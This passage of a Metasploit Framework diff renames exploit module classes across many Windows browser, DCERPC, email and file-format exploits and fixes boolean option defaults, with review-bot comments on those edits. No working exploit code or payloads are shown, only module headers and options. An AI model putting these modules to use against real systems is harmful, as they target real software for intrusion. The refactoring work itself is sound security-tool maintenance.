+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb
index 94fbfcded7..ad5a5c58d1 100644
--- a/modules/exploits/windows/browser/trendmicro_officescan.rb
+++ b/modules/exploits/windows/browser/trendmicro_officescan.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb
index f012e29f3c..def0203920 100644
--- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb
+++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
index 8bbdc303e6..8d4387ffd8 100644
--- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
index cdb9360048..3f80edb8c0 100644
--- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
+++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb
index 05b995f2ba..d7edd41d46 100644
--- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb
+++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb
index 9ad826a3e4..a3fc6e77cf 100644
--- a/modules/exploits/windows/browser/verypdf_pdfview.rb
+++ b/modules/exploits/windows/browser/verypdf_pdfview.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
index 5aac5af13b..aafaccaa1b 100644
--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
-'DisablePayloadHandler' => 'false',
+'DisablePayloadHandler' => false,
 'InitialAutoRunScript' => 'migrate -f'
 },
 'Payload' =>
diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb
index b6d98e0d67..e414e6fa6f 100644
--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb
index 69886b5b78..2e33ace44f 100644
--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
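Review bot: In viscom_movieplayer_drawtext.rb (the `-39,7` hunk), `'DisablePayloadHandler' => false` now holds a real boolean, but the entry still appears only to restate the option's stock value, so it reads as an override without being one. If this module needs the handler kept on for a reason of its own, a short comment such as `# handler must stay enabled: <reason>` above the entry would record that; otherwise the line can be dropped from `DefaultOptions`. The framework default is not visible in this hunk, so confirm it before removing the entry. The hash and its enclosing definition start and end outside the hunk.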
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
index 0751a93afc..7f4ca9edc9 100644
--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ManualRanking
 #
diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb
index a4aa0fee3e..6e337c99a7 100644
--- a/modules/exploits/windows/browser/webex_ucf_newobject.rb
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
index 6efae24eeb..ea7cda3260 100644
--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb
index eaba3e96eb..865b6b05f8 100644
--- a/modules/exploits/windows/browser/winamp_playlist_unc.rb
+++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 #
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 register_evasion_options(
 [
-OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
+OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false])
 ])
 end
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def generate_space
-if datastore['PlaylistSpaceInjection'] == true
+if datastore['PlaylistSpaceInjection']
 return rand_text(rand(100)+1, nil, " \t")
 else
 return ''
diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb
index 3d2cc4191f..ffd09d661d 100644
--- a/modules/exploits/windows/browser/winamp_ultravox.rb
+++ b/modules/exploits/windows/browser/winamp_ultravox.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb
index 4d7d428b0a..362458f78b 100644
--- a/modules/exploits/windows/browser/windvd7_applicationtype.rb
+++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb
index 725d4f1f67..9ceeca87a3 100644
--- a/modules/exploits/windows/browser/winzip_fileview.rb
+++ b/modules/exploits/windows/browser/winzip_fileview.rb
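Review bot: The option description in the `-67,7` hunk of winamp_playlist_unc.rb still ends with a stray double quote inside the string (`...in the playlist"'`), and the new line carries it over unchanged. Since the line is already being rewritten for the boolean default, the description should be closed cleanly: `OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist', false])`. The enclosing method begins before the hunk.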
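Review bot: `if datastore['PlaylistSpaceInjection']` in the `-119,7` hunk of winamp_playlist_unc.rb treats every value except `nil` and `false` as enabled, so a string such as `'false'` left in the datastore would now switch space injection on, where the old `== true` comparison kept it off. Whether the datastore normalises `OptBool` values before this read is not visible in the hunk; if it does, a comment like `# relies on OptBool normalisation: value is true/false, never a string` above the condition would make the assumption explicit. If it does not, the condition needs a check that rejects string values. `generate_space` continues past the end of the hunk.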
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 085e90f186..e73dab9d78 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 7a0c664d80..07d4cd0d81 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 4e53c13709..151f2e87c7 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 6fdd49587e..64fa89bcaa 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 96d12e137b..b50153df05 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index ce4d676070..c337ced797 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index 6e66961670..3a30a85b77 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index c96e02efd9..6f70408261 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 7c1644a853..b2850c5420 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 3a1fb0408b..2cd0def19c 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index dd935ca56b..a6ec6d8d85 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 6f5aa83335..2af7cccba2 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 9f479be312..8fe0d02d1d 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] - if datastore['HTML'] == true + if datastore['HTML'] body = create_email_body_html(datastore['MESSAGE'], msg.subject) content_type = "text/html; charset=\"iso-8859-1\"" msg.add_part(body, content_type, 'quoted-printable') diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index 609af5543f..de613c1c99 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index 07697ef91d..7839770d97 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 1ac3b2d0fd..8aa7292ccb 100644 --- a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index acbae74556..8c96c8ebe2 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb index d053f2fdad..a75d439009 100644 --- a/modules/exploits/windows/emc/replication_manager_exec.rb +++ b/modules/exploits/windows/emc/replication_manager_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb index d356673194..3adf2f2f65 100644 --- a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT 
diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index b5b5df41ca..3b4ad817a3 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index d3ba10d458..8fb6d3e430 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index d0e2e16721..e9df444bb5 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb index 81a9d67736..7e7812e50e 100644 --- a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb +++ b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT 
diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index b53d2e1068..7c625798f0 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 63bc9c8fcf..8e05a4b086 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 6af35d6482..b552117821 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 57d50e1f20..6bc77221ec 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index f1435ffe44..5e519cd03f 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index e73645b2ee..0ad971fa75 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index d67d68d24f..cb4a602a6f 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/pdf' require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index 5e4d7de6d3..0f7e4e0a76 100644 
--- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f47602744f..9cd953b2de 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 2a1bd72bf5..d7a76340f7 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 3abbfeaee9..c11e6b9043 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 49bb5b8e07..30aa1cec60 100644 
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index b5658a0430..369443f74e 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -17,7 +17,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index fd420091a1..bcb30ff04d 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index caa942dc5e..0a3e8b3a95 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index a64fa5f6ba..265eb15565 100644 
